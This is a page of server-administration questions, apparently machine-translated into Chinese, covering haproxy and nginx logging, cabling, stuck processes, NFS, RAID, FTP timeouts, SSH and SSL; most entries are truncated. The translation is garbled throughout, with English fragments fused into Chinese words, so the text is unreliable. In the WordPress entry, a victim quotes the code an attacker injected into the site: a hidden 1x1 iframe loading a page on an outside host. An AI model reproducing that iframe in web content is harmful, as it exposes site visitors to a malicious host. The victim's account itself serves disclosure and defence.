服务器问题集锦,包括 Linux(Ubuntu, Centos,Debian等)和Windows Server服务器
我在haproxy后面运行nginx(在同一台服务器上运行)。 我已经configurationhaproxy在nginx上使用一个简单的html文件来validation服务已经启动,因为我没有/想在这个主机上有一个有效的“/”URL。 Nginx不支持OPTIONS请求types(据我所知),这是haproxy使用的默认值,所以我把它改成了GET。 由于我在nginx中打开了访问日志,因此我在访问日志中获取了所有这些正常运行时间轮询请求。 有没有办法,我可以configurationNginx忽略某些请求,并跳过日志logging? 这是haproxy的后端: backend static_http option httpchk GET /test.html option redispatch balance roundrobin #fullconn 1000 server w1_static www1:81 check port 81 inter 2000 以下是我在nginx日志中看到的内容: 127.0.0.1 – – [24/Jul/2009:19:28:22 +0000] "GET /test.html HTTP/1.0" 200 12 "-" "-" 127.0.0.1 – – [24/Jul/2009:19:28:24 +0000] "GET /test.html HTTP/1.0" 200 12 "-" "-" 127.0.0.1 – – [24/Jul/2009:19:28:26 […]
我只需要将12根cat5电缆连接到配线架中。 这是我第一次真正做到这一点。 我相当有信心,在一些最初的A / B混淆之后,我以正确的顺序得到了所有的电线,但我并不完全相信所有的物理连接都是好的。 我没有理由怀疑,因为迄今为止我所testing的所有连接都完美地工作。 我在这里不知道的是连接失败的程度。 如果我搞砸了,只是一点点都不起作用,或者会有间歇性的问题,几乎无法追查? 我的公司的预算非常有限,所以我们没有任何适当的networkingtesting设备,我正在使用一个便宜的箱子$ 5手动冲压工具,而不是花费昂贵的,试图消除人为错误的工具。 到目前为止,我的testing过程是将每个打补丁的端口插入交换机,然后将我的个人笔记本电脑绕到墙壁sockets,我只是修补。 我将笔记本电脑插入墙上的插孔,看是否可以从DHCP服务器获取IP,并访问路由器的DD-WRTpipe理界面。 如果能够把pipe理界面正确地发送给我(这是一个相当详细的网页),我已经把它作为一个工作插口。 这是一个足够体面的testing过程,还是有另一种(和更准确)的方式来testing每个插孔(没有networking工具,请记住)。
我有一个消耗100%cpu的Linux进程,“kill -9 pid”不起作用。 这有点类似于: 如何杀死没有响应kill -9的进程 但是我确定这个pid没有改变,这是父进程。 我不认为它正在等待NFS。 过多的networkingstream量会导致这种行为吗? 任何其他的想法可能会导致这个过程卡住这样,除了重新启动,我能做些什么?
我已经设定了大约10个组策略,并且工作正常 。 虽然,看看ITpipe理员执行什么样的事情会很有趣。 如果你有很多的政策,只是展示一些,你觉得真的改变了一些东西。 我想你可以避免“默认许可” – >阻止一切可以,只有保持东西解锁,这是直接需要的。 这个问题是指Windows服务器:)虽然我不会回避Mac或Linuxpipe理员。
在一个较旧的Linux机器上,有一个Netapp的NFS挂载。 一旦这个盒子上的单个目录中有100k个文件,就不能再写入文件了。 任何人都知道这可能是什么原因? 我被告知符号链接仍然可以写。 当我查阅时,我会添加更具体的信息。 请跳过“使用更好的文件/文件夹结构和/或数据库”,我知道…
我试图调整我的NAS,运行openfiler,并想知道为什么我在RAID 5中的4个WD RE3驱动器中读取性能相对较差。 编辑: 请注意我说的缓冲磁盘读取速度没有caching的速度 编辑:改变格式,以清除有两组输出。 当我在元设备上运行hdparm时,我得到了我期望的性能水平,降到了音量,而且是速度的三分之一! 任何人都知道为什么? LVM不好吗? 院长 元设备/ dev / md0结果 [root @ nas2 etc]#hdparm -tT / dev / md0 的/ dev / md0的: 定时caching读取:2.00秒中的4636MB = 2318.96MB /秒 定时缓冲磁盘读取:3.01秒中的524 MB = 174.04 MB /秒 卷组/ dev / mapper / vg1-vol1结果 [root @ nas2 etc]#hdparm -tT / dev / mapper / vg1-vol1 的/ […]
我无法从互联网FTP(检索)一个大文件到我的Linux VM。 它过了一段时间。 实际的错误是“ 无法读取来自控制连接的回复 – 超时 ” 。几分钟后,在文件的一大块已经被传输之后,会发生此错误。 设置是: FTP客户端:ncftpget在VMWare Player 3.0的Linux上运行 FTP服务器:在互联网上的其他人的机器,configuration未知 客户操作系统:Ubuntu 8.10 Linux 32位,安装了vmxnet和vmware工具。 主机操作系统:Vista 64位 networking:Linux VM通过桥接NIC连接到Internet(也尝试NAT) FTP模式:PASV 我确实发现了一些论坛post,提到了2分钟的超时时间。 但究竟在哪里以及如何解决这个问题还不清楚。 一些故障排除步骤已经尝试 我已经从VMWare Player 3.0切换到VirtualBox 3.0.x,但没有运气。 我也从NAT更改为桥接虚拟网卡,但没有运气 更新 Linux虚拟机上的Netstat和DIR-655路由器上的等效pipe理页面都显示连接是活着的(tcp'ESTABLISHED'状态)。 Vista根本没有看到连接,如果连接状态只在虚拟机内pipe理,我想这是正常的。 下面是Vista上的netsh interface tcp show global的输出,以防万一: C:\ Users \ alex> netsh interface tcp show global 查询活动状态… TCP全局参数 ———————————————- 接收方缩放状态:启用 烟囱卸载状态:禁用 接收窗口自动调节级别:高度限制 附加拥塞控制提供程序:无 […]
我有数据库服务器,networking服务器,SVN服务器等。通常我在他们之间ssh …或者他们自动ssh。 我如何pipe理哪些服务器可以login到哪些其他的?
最终更新: 在过去的几个星期里,事情已经和平了,并且教会了我更多关于网站安全和风险的信息。 这是我的故事版本 – 我正在使用一个老版本的WordPress,可能这个人从谷歌抓到我。 我认为这是一个脚本攻击。 很难说什么时候,什么时候安全实际上是妥协的,这是我在2009年11月5日发现的。当时我采取了一些安全措施(如下所述),但总是有可能错过了在改变wordpress密码的时候我格式化了我的工作电脑。 现在我已经从主机中删除了所有不需要的PHP脚本,只让我的IP访问pipe理部分,阻止了一个属于越南的特定IP范围。 每日备份和其他的东西。 事情就是有太多的variables涉及到,而且很难跟踪每一件事情。 主要的教训是为它做好准备。 🙂 我正在通过GoDaddy共享托pipe计划并运行一个WordPress网站。 我的网站是在2009年11月5日第一次被黑客攻击的。当时黑客用自己的广告replace了我的广告。 我以为这是因为我对安全的懒惰而发生的,但是我错了。 我格式化了我的电脑,并再次设置一切。 用Microsoft Security Essentials取代了ESET NOD32。 升级到最新版本的WordPress。 更改了所有密码。 build立一个新的数据库。 和其他安全相关的东西我读到这里和那里。 事情有一段时间运行良好,直到我的网站今天再次被黑客攻击。 上次,这个人玩了很多文件,特别是改变了footer.php和所有与广告有关的文件。 但是这次他只是去了正确的地方,换成下面的代码 – <IFRAME height=1 src="http://blackberryrss.com/check.html" frameBorder=0 width=1></IFRAME> <form action="http://www.google.com/cse" id="cse-search-box"> <div> <input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" /> <input type="hidden" name="ie" value="ISO-8859-1" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" […]
我正在尝试决定是否将SSL用于Web应用程序。 它不处理信用卡或财务数据,但它存储的信息应该是私人/社会的原因。 也有通常的用户注册和loginfunction,可能应该保护。 我知道SSL会有一些性能下降,因为服务器和客户端都有encryption和解密。 另外,据我所知,encryption的数据不会压缩太多,所以Apache的mod_deflate可能不会工作。 performance可能有多大? 我打算做一些testing,但是我会对任何基于经验的评论感兴趣。